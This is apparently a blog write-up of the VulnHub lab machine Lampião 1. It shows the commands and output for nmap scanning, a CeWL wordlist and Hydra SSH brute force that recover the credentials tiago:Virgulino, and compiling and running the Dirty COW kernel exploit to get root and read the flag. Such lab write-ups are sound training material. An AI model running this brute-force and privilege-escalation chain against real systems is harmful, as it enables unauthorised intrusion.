Posted on by

Lampião One – Writeup

Details

This machine is https://www.vulnhub.com/entry/lampiao-1,249/

Recon Phase

I started by locating my target

root@kali:~# nmap -sn 192.168.56.0/24
Nmap scan report for 192.168.56.1
Host is up (0.00022s latency).
MAC Address: 0A:00:27:00:00:11 (Unknown)
Nmap scan report for 192.168.56.100
Host is up (0.00022s latency).
MAC Address: 08:00:27:49:0A:AD (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.102
Host is up (0.00037s latency).
MAC Address: 08:00:27:AB:9B:F7 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.101
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.10 seconds

I then carried out a service discovery scan

root@kali:~# nmap -sV -p- 192.168.56.102
Nmap scan report for 192.168.56.102
Host is up (0.00013s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.7 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http?
1898/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port80-TCP:V=7.70%I=7%D=8/30%Time=5B888161%P=x86_64-pc-linux-gnu%r(NULL
SF:,1179,"\x20_____\x20_\x20\x20\x20_\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\|_\x20\x20\x20_\|\x20\|\x20\(\x
SF:20\)\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\n\x20\x20\|\x20\|\x20\|\x20\|_\|/\x20___\x20\x20\x20\x20___\x20\x20
SF:__\x20_\x20___\x20_\x20\x20\x20_\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n
SF:\x20\x20\|\x20\|\x20\|\x20__\|\x20/\x20__\|\x20\x20/\x20_\x20\\/\x20_`\
SF:x20/\x20__\|\x20\|\x20\|\x20\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\x20_\
SF:|\x20\|_\|\x20\|_\x20\x20\\__\x20\\\x20\|\x20\x20__/\x20\(_\|\x20\\__\x
SF:20\\\x20\|_\|\x20\|_\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\x20\\___/\x20\\__\|
SF:\x20\|___/\x20\x20\\___\|\\__,_\|___/\\__,\x20\(\x20\)\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20__/\x20\|/\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\|___/\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\n______\x20_\x20\x20\x20\x20\x20\x20\x20_\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20_\x20\n\|\x20\x20___\(_\)\x20\x20\x
SF:20\x20\x20\|\x20\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\|\x20\|\n\
SF:|\x20\|_\x20\x20\x20_\x20\x20\x20\x20__\|\x20\|_\x20\x20\x20_\x20_\x20_
SF:_\x20___\x20\x20\x20__\x20_\x20\x20\x20\x20___\x20\x20__\x20_\x20_\x20\
SF:x20\x20_\x20\x20__\x20_\|\x20\|\n\|\x20\x20_\|\x20\|\x20\|\x20\x20/\x20
SF:_`\x20\|\x20\|\x20\|\x20\|\x20'_\x20`\x20_\x20\\\x20/\x20_`\x20\|\x20\x
SF:20/\x20_\x20\\/\x20_`\x20\|\x20\|\x20\|\x20\|/\x20_`\x20\|\x20\|\n\|\x2
SF:0\|\x20\x20\x20\|\x20\|\x20\|\x20\(_\|\x20\|\x20\|_\|\x20\|\x20\|\x20\|
SF:\x20\|\x20\|\x20\|\x20\(_\|\x20\|\x20\|\x20\x20__/\x20\(_\|\x20\|\x20\|
SF:_\|\x20\|\x20\(_\|\x20\|_\|\n\\_\|\x20\x20\x20\|_\|\x20\x20\\__,_\|\\__
SF:,_\|_\|\x20\|_\|");
MAC Address: 08:00:27:AB:9B:F7 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.04 seconds

Shell Hunting

I first checked out the webserver on port 80 at http://192.168.56.102

Screenshot 1

With nothing helpful there I moved onto the webserver on port 1898 at http://192.168.56.102:1898

Screenshot 2

Now this system was running drupal, I wanted to brute force entry but not against the drupal as I found from tests using dirbuster against the server it seemed to have some form of brute force protection. So I was going to try it against ssh. By looking at the drupal posts I was able to identify 2 usernames which I saved in a file called users.txt

tiago
Eder

I then wanted to try custom wordlists before setting up bigger ones, I found the most data was on http://192.168.56.102:1898/?q=node/1

root@kali:~# cewl -w potentialWords.txt http://192.168.56.102:1898/?q=node/1

Then I checked if it had worked

root@kali:~# wc -l potentialWords.txt
835 potentialWords.txt

As I wanted to avoid brute forcing the webserver, I set up hydra pointing at ssh hoping I’d have a bit of luck

root@kali:~# hydra -L users.txt -P potentialWords.txt -t 4 192.168.56.102 ssh
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2018-08-30 20:45:47
[DATA] max 4 tasks per 1 server, overall 4 tasks, 1670 login tries (l:2/p:835), ~418 tries per task
[DATA] attacking ssh://192.168.56.102:22/
[STATUS] 64.00 tries/min, 64 tries in 00:01h, 1606 to do in 00:26h, 4 active
[22][ssh] host: 192.168.56.102   login: tiago   password: Virgulino

I now had login creds for ssh of tiago:Virgulino

Priv Esc

root@kali:~# ssh [email protected]
[email protected]'s password:

Using my collected password

tiago@lampiao:~$

With a confirmed shell I began to look around

tiago@lampiao:~$ ls -la
drwxr-xr-x 4 tiago tiago 4096 Apr 20 14:48 .
drwxr-xr-x 3 root  root  4096 Apr 19 16:01 ..
drwx------ 2 tiago tiago 4096 Apr 19 16:25 .aptitude
-rw------- 1 tiago tiago   25 Apr 20 14:51 .bash_history
-rw-r--r-- 1 tiago tiago  220 Apr 19 16:01 .bash_logout
-rw-r--r-- 1 tiago tiago 3637 Apr 19 16:01 .bashrc
drwx------ 2 tiago tiago 4096 Apr 19 16:04 .cache
-rw-r--r-- 1 tiago tiago  675 Apr 19 16:01 .profile
-rw------- 1 root  root   577 Apr 19 17:35 .viminfo
tiago@lampiao:~$ cat /etc/passwd
tiago:x:1000:1000:tiago,,,:/home/tiago:/bin/bash
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
mysql:x:102:106:MySQL Server,,,:/nonexistent
tiago@lampiao:~$ sudo -l
Sorry, user tiago may not run sudo on lampiao.
tiago@lampiao:/var/www/html$ uname -a
Linux lampiao 4.4.0-31-generic #50~14.04.1-Ubuntu SMP Wed Jul 13 01:06:37 UTC 2016 i686 i686 i686 GNU/Linux

I then tried a few kernel exploits but none worked, so I moved onto dirty cow, settling on https://www.exploit-db.com/exploits/40616/ which I saved as cow.c, I then changed it from the x64 exploit to the x86 by uncommenting the x86 and commenting the x64

With the code ready to go I transferred it to the target

root@kali:~# scp cow.c [email protected]:/tmp/cow.c
cow.c                                                                                               100% 4834     4.0MB/s   00:00
tiago@lampiao:/var/www/html$ cd /tmp
tiago@lampiao:/tmp$ ls -la
drwxrwxrwt  2 root  root   4096 Aug 31 10:22 ./
drwxr-xr-x 21 root  root   4096 Apr 19 15:55 ../
-rw-r--r--  1 tiago tiago  4834 Aug 31 10:22 cow.c

With the code in place I compiled it

tiago@lampiao:/tmp$ gcc cow.c -o cow -pthread
[Some warnings]
tiago@lampiao:/tmp$ ls -la
drwxrwxrwt  2 root  root   4096 Aug 31 10:22 ./
drwxr-xr-x 21 root  root   4096 Apr 19 15:55 ../
-rwxrwxr-x  1 tiago tiago 12695 Aug 31 10:22 cow*
-rw-r--r--  1 tiago tiago  4834 Aug 31 10:22 cow.c

The compiled exploit was now ready, so I ran it

tiago@lampiao:/tmp$ ./cow
DirtyCow root privilege escalation
Backing up /usr/bin/passwd.. to /tmp/bak
Size of binary: 45420
Racing, this may take a while..
thread stopped
thread stopped
/usr/bin/passwd is overwritten
Popping root shell.
Don't forget to restore /tmp/bak
root@lampiao:/tmp#

Now with a root shell I had to stabilise the kernel a bit and also fix the passwd file it overwrote

root@lampiao:/tmp# echo 0 > /proc/sys/vm/dirty_writeback_centisecs
root@lampiao:/tmp# mv /tmp/bak /usr/bin/passwd

With that done, I could collect the flag

root@lampiao:/tmp# cd /root
root@lampiao:/root# ls -la
drwx------  4 root root 4096 Apr 20 14:46 .
drwxr-xr-x 21 root root 4096 Apr 19 15:55 ..
drwx------  2 root root 4096 Apr 19 16:34 .aptitude
-rw-------  1 root root  201 Apr 20 14:51 .bash_history
-rw-r--r--  1 root root 3106 Feb 19  2014 .bashrc
drwx------  2 root root 4096 Apr 20 14:46 .cache
-rw-------  1 root root  149 Apr 19 16:34 .mysql_history
-rw-r--r--  1 root root  140 Feb 19  2014 .profile
-rw-------  1 root root  669 Apr 20 14:45 .viminfo
-rw-r--r--  1 root root   33 Apr 20 14:41 flag.txt
root@lampiao:/root# cat flag.txt
9740616875908d91ddcdaa8aea3af366

Now I generally try to avoid exploits like dirty cow as they can lead to the system crashing, but in this case I decided to use it and it ended up working out for me!

Published by Jack

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.